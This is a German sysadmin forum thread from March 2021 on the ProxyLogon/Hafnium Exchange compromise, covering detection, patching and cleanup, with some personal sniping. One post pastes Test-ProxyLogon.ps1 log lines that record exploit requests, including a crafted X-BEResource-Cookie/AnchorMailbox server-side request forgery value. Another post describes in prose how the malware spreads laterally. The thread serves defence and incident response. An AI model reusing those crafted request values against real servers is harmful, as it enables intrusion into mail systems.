Leider gibt es auf Grund der Corona Krise aktuell genug (Freizeit)helden ohne Praxisbezug, daher /ignore
Bitte warten ..
Mitglied: nachgefragt
11.03.2021, aktualisiert um 09:38 Uhr
Zitat von @KITSER:
Ein sehr ungutes Gefühl bleibt aber trotzdem....
Auf mehrfaches Anraten hin hatten wir zudem alle Domänenkennwörter geändert, es war wohl möglich auch diese abzugreifen.
Bitte warten ..
Mitglied: Mystery-at-min
11.03.2021 um 09:47 Uhr
Da die Angreifer entweder am 2.3/3.3 sichtbare Erstangriffe fuhren oder gar nicht (kurioserweise, wir sammeln noch), sollte über weitere Schritte nachgedacht werden.
Bitte warten ..
Mitglied: themuck
11.03.2021 um 10:48 Uhr
Zitat von @Mystery-at-min:

Da die Angreifer entweder am 2.3/3.3 sichtbare Erstangriffe fuhren oder gar nicht (kurioserweise, wir sammeln noch), sollte über weitere Schritte nachgedacht werden.


"Jedenfalls haben am 27. Januar 2021 Sicherheitsforscher der Firma Dubex Microsoft über aktive Angriffe auf Exchange-Server informiert. Bereits am 29. Januar 2021 berichtete Trend Micro in einem Blog-Beitrag von Angreifern, die über Schwachstellen eine Webshell als Hintertür auf Exchange-Servern installierten. Der Praktiker hätte es ab diesem Zeitpunkt mit "da brennt die Hütte" umschrieben. Am 2. Februar 2021 warnte auch Volexity Microsoft."

https://www.heise.de/news/Der-Hafnium-Exchange-Server-Hack-Anatomie-eine ...

Andere Sprechen vom 26.2 als Stichtag... aber IMHO kann es doch jeden getroffen haben der so einen Eimer 2021 offen am Netz hatte.
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
11.03.2021, aktualisiert um 11:02 Uhr
Zitat von @nachgefragt:
Zitat von @147669:
verantwortungsvoller Admin
Der Hafnium Exchange-Server-Hack: Anatomie einer Katastrophe
Wieder völlig aus dem Kontext gerissen... Es ging in meiner Aussage oben darum das ein Admin alle potentiellen Auswirkungen in Betracht ziehen muss wenn man Eindringlinge im Netzwerk hat nicht mehr und nicht weniger.
Und man sieht ja jetzt deutlich das ein infizierter Exchange "alleine" die Ausnahme ist und vielfach durch den Hack weitere Infektionen im internen Netz bekannt werden, die mir eben auch bei einem Kunden schon letzte Woche aufgefallen sind.
Jetzt kannst du uns alle erleuchten Dr. Best; bisher muss ich annehmen, deinerseits beruflicher Praxis max. 1%
Leider gibt es auf Grund der Corona Krise aktuell genug (Freizeit)helden ohne Praxisbezug, daher /ignore
Ach ja, du musst es ja wissen, das Niveau sinkt dann wie so oft hier auf die Vorschulstufe wenn einem die Argumente ausgehen ...
Bitte warten ..
Mitglied: Cyprian1981
11.03.2021, aktualisiert um 12:30 Uhr
Hallo zusammen, wie würdet ihr das Log (Test-ProxyLogon.ps1) interpretieren?

#TYPE Selected.System.Management.Automation.PSCustomObject
"DateTime","RequestId","ClientIpAddress","UrlHost","UrlStem","RoutingHint","UserAgent","AnchorMailbox","HttpStatus"
"2021-03-03T07:43:27.380Z","4747bfc1-9044-45b3-b32f-4a2344b500a5","86.105.18.116","xxx.xxx.xx.xxx","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCH-SRV.doamin.lokal:444/autodiscover/autodiscover.xml?#","200"
"2021-03-03T11:14:29.645Z","ee8fabd4-0dd0-4bf7-a3dd-185ffdc5fc71","86.105.18.116","xxx.xxx.xx.xxx","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCH-SRV.doamin.lokal:444/autodiscover/autodiscover.xml?#","200"
"2021-03-03T18:51:30.066Z","deee9bf4-346f-4793-988f-cfceb550eb2b","182.18.152.105","xxx.xxx.xx.xxx","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCH-SRV.doamin.lokal:444/autodiscover/autodiscover.xml?#","200"

ASPX Dateien wurden nicht gefunden!

Viele Grüße,

cyprian
Bitte warten ..
Mitglied: wieoderwas
11.03.2021, aktualisiert um 12:33 Uhr
Die IP Adressen würde mich stutzig machen. Diese Einträge hatten wir auch in unserem Log File.

Aber man muss auch sagen, dass viele Logeinträge false positve Meldungen sind.
Habe zum Beispiel Sophos installiert und danach wurde solche Einträge als verdächtig angezeigt.

Bitte warten ..
Mitglied: IT-Spezi
11.03.2021, aktualisiert um 14:30 Uhr
Zitat von @nachgefragt:

Zitat von @KITSER:
Ein sehr ungutes Gefühl bleibt aber trotzdem....
Auf mehrfaches Anraten hin hatten wir zudem alle Domänenkennwörter geändert, es war wohl möglich auch diese abzugreifen.
Aus meiner Sicht reicht es diesmal nicht, nur die Kennwörter zu ändern. Das Ding ist echt verdammt böse.
Nachdem das Ding die Exchange-Verzeichnisse verhunzt, sich neue Rechte vergeben und einen Update Dienst alle 45 Min., installiert, folgt der eigentliche Angriff auf das Netz. Zuerst wird das gesammt Netzwerk gescannt und der Scan-Inhalt übertragen. In den Powershell-Skripten wird so viel versteckt mit verschlüsselten Skripts in verschlüsselten Skripts, dass weder Mensch, noch Virenschutz einfach durchblickt. Es werden Angriffs-DLLs je nach 32 oder 64 Bit und Verschlüsselungs-Komponenten heruntergeladen. Danach wird versuchte jede im Netz erreichbare Windows-Kiste mit bekannten Angriffstechniken (offensichtlich ein "Katzenliebhaber") zu infiltrieren.
Das Ding ruht sich also nicht auf dem Exchange aus und man muss erst einmal davon ausgehen, dass das eigene Netz feindlich geworden ist und sich die Kisten gegenseitig anstecken. Aus meiner Sicht ist das Problem mit einem simplen "Ich setz' mal den Exchange neu auf und ändere die Kennwörter" nicht erledigt.
Ein Gegenangriffspunkt wäre, dass das Ding noch immer die gleichen Control-Server nutzt. Auch handelt es sich nicht unbedingt um etwas neues.

Gruß

its
Bitte warten ..
Mitglied: wieoderwas
11.03.2021, aktualisiert um 15:17 Uhr
Das Ding ruht sich also nicht auf dem Exchange aus und man muss erst einmal davon ausgehen, dass das eigene Netz feindlich geworden ist und sich die Kisten gegenseitig anstecken. Aus meiner Sicht ist das Problem mit einem simplen "Ich setz' mal den Exchange neu auf und ändere die Kennwörter" nicht erledigt.

Alles schön und gut. Aber mehr als die Systeme aktuell zu halten und Virenscanner, Passwörter ändern, Dienstkonten überprüfen, MSET ausführen, Ereignisprotokolle prüfen, Firewall Logs checken und die bekannte Pfade und Scripte ausführen, Sicherungen zusätzlich extern lagern etc... kann man doch auch nicht?
Oder hast du noch andere Ideen?
Bitte warten ..
Mitglied: Mystery-at-min
11.03.2021 um 15:22 Uhr
Zitat von @wieoderwas:

Das Ding ruht sich also nicht auf dem Exchange aus und man muss erst einmal davon ausgehen, dass das eigene Netz feindlich geworden ist und sich die Kisten gegenseitig anstecken. Aus meiner Sicht ist das Problem mit einem simplen "Ich setz' mal den Exchange neu auf und ändere die Kennwörter" nicht erledigt.

Alles schön und gut. Aber mehr als die Systeme aktuell zu halten und Virenscanner, Passwörter ändern, Dienstkonten überprüfen, MSET ausführen, Ereignisprotokolle prüfen, Firewall Logs checken und die bekannte Pfade und Scripte ausführen, Sicherungen zusätzlich extern lagern etc... kann man doch auch nicht?
Oder hast du noch andere Ideen?

Neuinstallieren wäre eine Option. Tiefenprüfung etc.
Bitte warten ..
Mitglied: themuck
11.03.2021, aktualisiert um 15:30 Uhr
https://www.heise.de/news/Livestream-zum-Exchange-Hack-BSI-beantwortet-F ...

https://www.youtube.com/watch?v=QcqRRc-VoB0

vielleicht ja interessant für den ein oder anderen...


Zitat von @wieoderwas:
Oder hast du noch andere Ideen?

Wir schauen uns Aktuell genauer das Traffic-Monitoring an und vor allem die Historie der Kontakte / Ports und Auslastung, ruhig bis Sep. 2020. Wir sind aber nicht befallen, türen immer zu, kein Test Tool hat angeschlagen, Traffic-Monitoring unauffällig. Ich denke aber das meinst du mit FW Logs... Ich würde noch zu sehen das ich backups wirklich Offline habe auch aus 2020 um mit einem Cold Standby wieder neu zu starten. Vielleicht wurde ja auch ein "Bios" gehackt ;).
Bitte warten ..
Mitglied: IT-Spezi
11.03.2021 um 15:35 Uhr
Zitat von @wieoderwas:
Alles schön und gut. Aber mehr als die Systeme aktuell zu halten und Virenscanner, Passwörter ändern, Dienstkonten überprüfen, MSET ausführen, Ereignisprotokolle prüfen, Firewall Logs checken und die bekannte Pfade und Scripte ausführen, Sicherungen zusätzlich extern lagern etc... kann man doch auch nicht?
Oder hast du noch andere Ideen?
Hängt natürlich von Eurer Austattung ab. Ich weiß natürlich auch nicht, wie stark Dein Netz gegen "internes Hacking" abgesichert ist und ob Ihr über so etwas wie "Synchronised Security" verfügt. Die Control-Server sollten natürlich in der Firewall gesperrt sein. Es gibt auch schon eine Code-Analyse, die Du Dir vielleicht mal ansehen kannst. Die geplanten Tasks und Dienste solltest Du auf den Kisten überprüfen, ob da etwas hinzu gekommen ist. Sieh mal nach, ob Du das Skripting noch ein wenig absichern kannst. (Es wird in den ersten Phasen vor allem PowerScript eingesetzt.)
Und pack den Exchange nicht mehr offen ins Netz, sondern hinter eine VPN.
Wenn das Kind allerdings in den Brunnen gefallen ist, sollte man sich aus o.g. Gründen nicht nur auf den Exchange konzentrieren, sondern muss an alle Windows-Kisten mal ran.

Gruß

its
Bitte warten ..
Mitglied: wieoderwas
11.03.2021 um 15:50 Uhr

BSI Seite = 503 Service Unavailable...
Bitte warten ..
Mitglied: GeorgBohn
11.03.2021 um 16:08 Uhr
Kann vielleicht mal einer der Gehackten berichten ob er ecp aus dem öffentlichen Netz erlaubt gelassen hatte?

Ich hatte ecp nur aus dem lokalen Netz erlaubt und die Protokolle ergeben für die Hackversuche http500.

Ich kann auch nach intensivster Suche nichts auffälliges im Exchange/AD finden.
Bitte warten ..
Mitglied: Mitchell
11.03.2021, aktualisiert um 16:31 Uhr
Jetzt kannst du uns alle erleuchten Dr. Best; bisher muss ich annehmen, deinerseits beruflicher Praxis max. 1%
Leider gibt es auf Grund der Corona Krise aktuell genug (Freizeit)helden ohne Praxisbezug, daher /ignore

Solche Spitzen bitte unterlassen, hätte wirklich nicht sein müssen. Eine PM gibts jetzt mal nicht in der Hoffnung, dass diese Art der Diskussion ein Ende hat. Bei den nächsten 5 Meldungen überlegen wir mal weiter....
Darauf einen Cappu, haut rein.

Mfg
Mitchell
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 08:04 Uhr
moin...
Zitat von @IT-Spezi:

Zitat von @nachgefragt:

Zitat von @KITSER:
Ein sehr ungutes Gefühl bleibt aber trotzdem....
Auf mehrfaches Anraten hin hatten wir zudem alle Domänenkennwörter geändert, es war wohl möglich auch diese abzugreifen.
Aus meiner Sicht reicht es diesmal nicht, nur die Kennwörter zu ändern. Das Ding ist echt verdammt böse.
Nachdem das Ding die Exchange-Verzeichnisse verhunzt, sich neue Rechte vergeben und einen Update Dienst alle 45 Min., installiert, folgt der eigentliche Angriff auf das Netz. Zuerst wird das gesammt Netzwerk gescannt und der Scan-Inhalt übertragen. In den Powershell-Skripten wird so viel versteckt mit verschlüsselten Skripts in verschlüsselten Skripts, dass weder Mensch, noch Virenschutz einfach durchblickt. Es werden Angriffs-DLLs je nach 32 oder 64 Bit und Verschlüsselungs-Komponenten heruntergeladen. Danach wird versuchte jede im Netz erreichbare Windows-Kiste mit bekannten Angriffstechniken (offensichtlich ein "Katzenliebhaber") zu infiltrieren.
Das Ding ruht sich also nicht auf dem Exchange aus und man muss erst einmal davon ausgehen, dass das eigene Netz feindlich geworden ist und sich die Kisten gegenseitig anstecken. Aus meiner Sicht ist das Problem mit einem simplen "Ich setz' mal den Exchange neu auf und ändere die Kennwörter" nicht erledigt.
Ein Gegenangriffspunkt wäre, dass das Ding noch immer die gleichen Control-Server nutzt. Auch handelt es sich nicht unbedingt um etwas neues.

Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!

Gruß

its
Frank
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 08:28 Uhr
moin...
Zitat von @147669:

Zitat von @nachgefragt:
Na wenn du jetzt noch konkrete Vorschläge dazu bringst ohne das man es dir aus der Nase ziehen muss könnte ich fast annehmen, dass du es sogar beruflich machst und forenkollegial einen nützlichen Beitrag lieferst.
Was erwartest du hier? Sollen wir dir hier jetzt im kleinsten die Grundlagen eines Netzwerk-Admins beibringen?? Du erwartest etwas was in diesem Rahmen einfach nicht leistbar ist außer du bezahlst uns die Zeit für eine Schulung.
klasse.... ähnliches habe ich schon öfter hier gelesen, allerdings ist der User nicht mehr unter uns....
ich denke du hast administrator.de nicht verstanden, natürlich wollen wir die Grundlagen eines Netzwerk-Admins beibringen, bei nachfrage..
auch du bist nicht als Fachmann auf die welt gekommen... ich auch nicht! und deswegen wollen wir Helfen!
natürlich machen wir keine Schulung, aber du kannst hinweise geben, was getan werden kann, bzw. muss!

Malware Entfernung und Analyse lernt man eben nicht durch Foren-Threads sondern mit der Zeit und vor allem Praxis, da bringen einem auch Zertifizierungen wenig bis nichts. Außerdem ist jedes Netz anders und erfordert andere Vorgehensweisen!
da hast du recht, allerdings kannst du ja sachdienliche hinweise liefern...
Schönen Feierabend!
Dito.

Frank
Bitte warten ..
Mitglied: themuck
12.03.2021 um 08:50 Uhr
Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!
Frank

https://www.youtube.com/watch?v=rn-6t7OygGk

Das wurde in einem anderen Thema gepostet und fand ich sehr gut erklärt / gemacht. Bin mir aber nicht sicher ob es das ist was du suchst. Ich finde die Informationslage auch dürftig und beim BSI Livestream kam gestern nicht viel rum...
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 09:09 Uhr
moin..
Zitat von @themuck:

Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!
Frank

https://www.youtube.com/watch?v=rn-6t7OygGk

Das wurde in einem anderen Thema gepostet und fand ich sehr gut erklärt / gemacht. Bin mir aber nicht sicher ob es das ist was du suchst. Ich finde die Informationslage auch dürftig und beim BSI Livestream kam gestern nicht viel rum...
das Video kenne ich... und suchen muss ich nix, es geht mir eigentlich mehr um User ohne oder wenig erfahrung.
es geht hier um Sicherheit, und nicht um wie installiere ich ne RDS Farm.... das sind infos, die nicht für jeden (Anfänger) leicht zu finden sind.
auch wenn wir uns 1000 mal wiederholen müssen...
und jedes System was sauber ist, oder offline- macht auch unsere systeme sicherer

Frank
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 09:36 Uhr
Zitat von @Vision2015:

moin..
Zitat von @themuck:

Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!
Frank

https://www.youtube.com/watch?v=rn-6t7OygGk

Das wurde in einem anderen Thema gepostet und fand ich sehr gut erklärt / gemacht. Bin mir aber nicht sicher ob es das ist was du suchst. Ich finde die Informationslage auch dürftig und beim BSI Livestream kam gestern nicht viel rum...
das Video kenne ich... und suchen muss ich nix, es geht mir eigentlich mehr um User ohne oder wenig erfahrung.
es geht hier um Sicherheit, und nicht um wie installiere ich ne RDS Farm.... das sind infos, die nicht für jeden (Anfänger) leicht zu finden sind.
auch wenn wir uns 1000 mal wiederholen müssen...
und jedes System was sauber ist, oder offline- macht auch unsere systeme sicherer

Frank

Da bleiben nur zwei Möglichkeiten, ein IT-TÜV oder höhere Strafen an die Personen, die sich für Stellen bewerben, die solche Kenntnisse voraussetzen. Systeme offline schalten wird wohl nicht passieren, Personen die sich auskennen machen das Leben und die Systeme aller sicherer - hier sind im ersten Schritt Grenzen durch Microsoft gesetzt, im zweiten kommt diese massiv ins Spiel. Das Internetforen eine passende Erfahrung nicht ersetzen kann, sieht @147669 ganz richtig. Im Zweifel führt man sogar Dinge durch, die dadurch schädigend sind. Wenn dies einfach einfach wäre, hätten wir bereits seit einer Woche komplette Informationen durch die Profis bei CERT, BSI..., haben wir nicht, Also gilt es hier mehr denn je Profis hin zu ziehen und nicht nach Schema "schaun wir mal" und "bisher konnten wir auch alles irgendwie ans Laufen bringen."
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 10:15 Uhr
Zitat von @Mystery-at-min:

Zitat von @Vision2015:

moin..
Zitat von @themuck:

Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!
Frank

https://www.youtube.com/watch?v=rn-6t7OygGk

Das wurde in einem anderen Thema gepostet und fand ich sehr gut erklärt / gemacht. Bin mir aber nicht sicher ob es das ist was du suchst. Ich finde die Informationslage auch dürftig und beim BSI Livestream kam gestern nicht viel rum...
das Video kenne ich... und suchen muss ich nix, es geht mir eigentlich mehr um User ohne oder wenig erfahrung.
es geht hier um Sicherheit, und nicht um wie installiere ich ne RDS Farm.... das sind infos, die nicht für jeden (Anfänger) leicht zu finden sind.
auch wenn wir uns 1000 mal wiederholen müssen...
und jedes System was sauber ist, oder offline- macht auch unsere systeme sicherer

Frank

Da bleiben nur zwei Möglichkeiten, ein IT-TÜV oder höhere Strafen an die Personen, die sich für Stellen bewerben, die solche Kenntnisse voraussetzen. Systeme offline schalten wird wohl nicht passieren, Personen die sich auskennen machen das Leben und die Systeme aller sicherer - hier sind im ersten Schritt Grenzen durch Microsoft gesetzt, im zweiten kommt diese massiv ins Spiel. Das Internetforen eine passende Erfahrung nicht ersetzen kann, sieht @147669 ganz richtig. Im Zweifel führt man sogar Dinge durch, die dadurch schädigend sind. Wenn dies einfach einfach wäre, hätten wir bereits seit einer Woche komplette Informationen durch die Profis bei CERT, BSI..., haben wir nicht, Also gilt es hier mehr denn je Profis hin zu ziehen und nicht nach Schema "schaun wir mal" und "bisher konnten wir auch alles irgendwie ans Laufen bringen."
Da bleiben nur zwei Möglichkeiten, ein IT-TÜV oder höhere Strafen an die Personen, die sich für Stellen bewerben, die solche Kenntnisse voraussetzen.

da hast du ja recht.... allerdings gibbet auch viele kleine Firmen, die keinen Administrator mir 25 Jahren Erfahrung und Wissen haben- sondern selber ihr kleine Netz verwalten... was machen wir mit denen? und alle anfänger? nach dem motto... du hast keine fachwissen, also sagen wir dir nix! Sorry, das ist blödsinn... dann brauchen wir auch kein Forum!

Frank
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 10:38 Uhr
Glaubensfrage, Hausanschluss ohne Elektriker? TÜV vom Mopedbastler von nebenan, ich kenne die Auswirkungen von fehlender Meisterpflicht und Ausbildungen in einigen Ländern... Es gibt einiges mit gutem Grund zu einer gewissen Formalie in Bezug aus Ausbildung und Erfahrung . Warum soll das in der IT also so unwichtig sein. Würde darauf tippen, dass die Sache mittlerweile mindestens genau so kritisch ist. Meinst du nicht?

Außerdem bitte bleib auf dem Boden der Tatsachen, von nichts sagen kann nicht gesprochen werden. Die Faktenlage ist allgemein dünn. Aber komplette Handlungsanweisungen - Tendenz "schreib mir bitte fachgerecht für meine Umgebung einen Handlungsplan für "nicht fachwissende" - das kann nicht der Anspruch sein.

Ich vermute auch, dass dies keine Hey-Joe Stelle war. (Schema, du kannst den Computer anschalten, mach du IT). Es wird über eine Klarnamenpflicht diskutiert, wäre zumindest zuordnungsmäßig spannend und würde wohl erschreckendes ans Licht bringen.
Bitte warten ..
Mitglied: dertowa
12.03.2021 um 10:54 Uhr
Zitat von @Vision2015:
und jedes System was sauber ist, oder offline- macht auch unsere systeme sicherer

Kann ich nur zustimmen, wenn man dann aber bspw. liest:
Erschwerend hinzu kommt Microsofts Patch-Policy, die zwingend zunächst das Upgrade auf ein noch unterstütztes kumulatives Update erforderte. Da diese vierteljährlich erscheinenden CUs nicht ganz einfach einzuspielen sind und es dabei in der Vergangenheit öfter zu Problemen und Fehlfunktionen kam, befinden sich viele Server auf einem älteren Stand.
Quelle: heise.de

Da sollte doch jeder Admin hinterher sein, die aktuellen Updates einzuspielen und am neusten Stand zu sein.
Zu Zeiten in denen ich auch noch eines Exchange 2013 on premise betreut habe, waren diese Updates auch
immer etwas zeitintensiv bei der Installation.

Wer damit überfordert ist, bzw. einfach die Zeit oder das Personal fehlt, dem bietet Microsoft seit Jahren den Exchange Online.

Also sicherlich kann man dem Hersteller vorwerfen die Updates nicht so schnell wie möglich bereitgestellt zu haben, aber nicht,
dass diese Aktualisierungen immer nur für den letzten Patchstand ausgerollt werden.
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 11:01 Uhr
Da sollte doch jeder Admin hinterher sein, die aktuellen Updates einzuspielen und am neusten Stand zu sein.
Zu Zeiten in denen ich auch noch eines Exchange 2013 on premise betreut habe, waren diese Updates auch
immer etwas zeitintensiv bei der Installation.

Auf dem Punkt: IT ist nichts (mehr) für nebenher und IT wird auch nicht billiger wenn man es mit weniger Erfahrung betreut. Das gilt im Zweifel auch für Hosted oder cloud Produkte.
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 11:06 Uhr
moin...
Zitat von @Mystery-at-min:

Glaubensfrage, Hausanschluss ohne Elektriker? TÜV vom Mopedbastler von nebenan, ich kenne die Auswirkungen von fehlender Meisterpflicht und Ausbildungen in einigen Ländern... Es gibt einiges mit gutem Grund zu einer gewissen Formalie in Bezug aus Ausbildung und Erfahrung . Warum soll das in der IT also so unwichtig sein. Würde darauf tippen, dass die Sache mittlerweile mindestens genau so kritisch ist. Meinst du nicht?
natürlich.... und was machen wir dann mit den 3-5Mann Firmen, die ihr Netzwerk selber verwalten?
mach doch mal vorschläge..... :-) face-smile

Außerdem bitte bleib auf dem Boden der Tatsachen, von nichts sagen kann nicht gesprochen werden.
du, das bin ich...
Die Faktenlage ist allgemein dünn. Aber komplette Handlungsanweisungen - Tendenz "schreib mir bitte fachgerecht für meine Umgebung einen Handlungsplan für "nicht fachwissende" - das kann nicht der Anspruch sein.
davon hat doch keiner gesprochen... und das ist blödsinn!

Ich vermute auch, dass dies keine Hey-Joe Stelle war. (Schema, du kannst den Computer anschalten, mach du IT). Es wird über eine Klarnamenpflicht diskutiert, wäre zumindest zuordnungsmäßig spannend und würde wohl erschreckendes ans Licht bringen.
sorry, ich muss lachen, wiso muss das eine stelle gewesen sein? in kleinen firmen gibbet die Stelle Administrator nicht...
und bei den hunderten privaten exchange servern erst recht nicht.... das darf keiner vergessen, das kannst auch du nicht schönreden!

Es wird über eine Klarnamenpflicht diskutiert, wäre zumindest zuordnungsmäßig spannend und würde wohl erschreckendes ans Licht bringen.
aha... und was hat das mit dem thema zu tun? ....ah nix :-) face-smile
Frank
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 11:21 Uhr
OK, es wird von Kollegen gesprochen. Der Rest ergibt sich aus diesen Daten. Position, Größe des Netzwerks...ich glaube, du würdest deinen Augen nicht trauen (wollen). Allerdings wäre es natürlich auch fair gegenüber den Chefs.

Aus der Erfahrung der übernommenen Netze...

Und der Boden der Tatsachen...zweifelhaft.

Aber zurück zum Thema, führt hier nur zum selben Ergebnis wie bei einem Hey Joe ruf...: https://winfuture.de/news,121688.html
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 11:37 Uhr
moin...
Zitat von @Mystery-at-min:

OK, es wird von Kollegen gesprochen. Der Rest ergibt sich aus diesen Daten. Position, Größe des Netzwerks...ich glaube, du würdest deinen Augen nicht trauen (wollen). Allerdings wäre es natürlich auch fair gegenüber den Chefs.
ich kenne das... wir übernehmen und unterstützen fast jede woche neue firmen die hilfe brauchen, und schulen admins!

Aus der Erfahrung der übernommenen Netze...
aha..

Und der Boden der Tatsachen...zweifelhaft.
:-) face-smile

Aber zurück zum Thema, führt hier nur zum selben Ergebnis wie bei einem Hey Joe ruf...: https://winfuture.de/news,121688.html
ebend...

Frank
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 11:46 Uhr
Dann muss man dazu nichts mehr sagen. Ich gehe davon aus/hoffe, dass Ihr denen nicht sagt, sucht mal im Internet und bewertet mit eurem Wissen (wenn das da, wäre die Schulung unnötig) was Ihr wie braucht.

Na denn, https://www.linux-magazin.de/news/streit-um-veroeffentlichung-von-exploi ... geht hier weiter. Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 12:06 Uhr
moin...
Zitat von @Mystery-at-min:

Dann muss man dazu nichts mehr sagen. Ich gehe davon aus/hoffe, dass Ihr denen nicht sagt, sucht mal im Internet und bewertet mit eurem Wissen (wenn das da, wäre die Schulung unnötig) was Ihr wie braucht.
nun.. das Internet ist beim lernen eine große hilfe... wir haben momentan 3 praktikanten für 3 wochen... alles Admins :-) face-smile

Na denn, https://www.linux-magazin.de/news/streit-um-veroeffentlichung-von-exploi ... geht hier weiter. Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)

Frank
Bitte warten ..
Mitglied: goscho
12.03.2021 um 14:45 Uhr
Zitat von @Vision2015:
Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Was machen die Admins/Betreuer dieser Firmen? Verreist sein können sie ja eh kaum. ;-) face-wink
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 14:53 Uhr
Zitat von @goscho:

Zitat von @Vision2015:
Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Was machen die Admins/Betreuer dieser Firmen? Verreist sein können sie ja eh kaum. ;-) face-wink

Das ist das oben angerissene Problem. Sind es Administratoren, die eigentlich Praktikanten sind? (Da wir Freitag haben) ;-) face-wink
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 15:44 Uhr
moin...
Zitat von @goscho:

Zitat von @Vision2015:
Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Was machen die Admins/Betreuer dieser Firmen? Verreist sein können sie ja eh kaum. ;-) face-wink

Zitat von @goscho:

Zitat von @Vision2015:
Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Was machen die Admins/Betreuer dieser Firmen? Verreist sein können sie ja eh kaum. ;-) face-wink
na die machen nix... weil sich von denen keiner getraut hat nen update zu machen.... 80% davon sind keine admins, sondern kleine firmen bzw. private exchange server.... alles mail anfragen, und weil ein update durch uns geld kostet... meldet sich keiner mehr :-) face-smile

Frank
Bitte warten ..
Mitglied: Vision2015
12.03.2021 um 16:13 Uhr
Moin...
Zitat von @Mystery-at-min:

Zitat von @goscho:

Zitat von @Vision2015:
Wir warten noch auf Feedback von min 3 Handvoll interner oder semi interner oder externer Systembetreuer, die Ihre Exchange noch nicht gepatched haben. Nachdruck hilft da nicht. Darf man bewerten wie man möchte.
wir wissen von mindestens 50-60 Ex Servern, ohne update... mitlerweile hat ja MS updates für alle versionen.... ich hoffe die kommen alle mal aus dem Quark....

Was machen die Admins/Betreuer dieser Firmen? Verreist sein können sie ja eh kaum. ;-) face-wink

Das ist das oben angerissene Problem. Sind es Administratoren, die eigentlich Praktikanten sind? (Da wir Freitag haben) ;-) face-wink
Richtig... das wollen Administratoren sein! (auch am Montag) :-) face-smile
und mit etwas Glück, werden es irgendwann auch mal Administratoren......

Frank
Bitte warten ..
Mitglied: Mystery-at-min
12.03.2021 um 16:25 Uhr
Bis es richtig ins Geld geht. Das meine ich auch mit Anforderungen an IT. Am Auto macht man es schliesslich auch, widerwillig, zähneknirschend...hilft aber nichts.
Bitte warten ..
Mitglied: IT-Spezi
14.03.2021 um 22:09 Uhr
Zitat von @Vision2015:
Danke für die Info, hast du dazu auch eine Quellenangabe, bzw. beispiele welche Verschlüsselungs-Komponenten heruntergeladen werden usw....
nicht alle User, besonders einige Anfänger unter uns, Fehlen solche Infos!

Hallo Frank,

Leider hat Microsoft schon einige Code-Analysen auf github wieder gelöscht.
Siehe auch:
https://www.heise.de/meinung/Kommentar-Microsoft-kann-Exchange-Exploits- ...

Aber zum Glück gibt's zu dem Thema noch etwas.
https://gist.github.com/JohnHammond
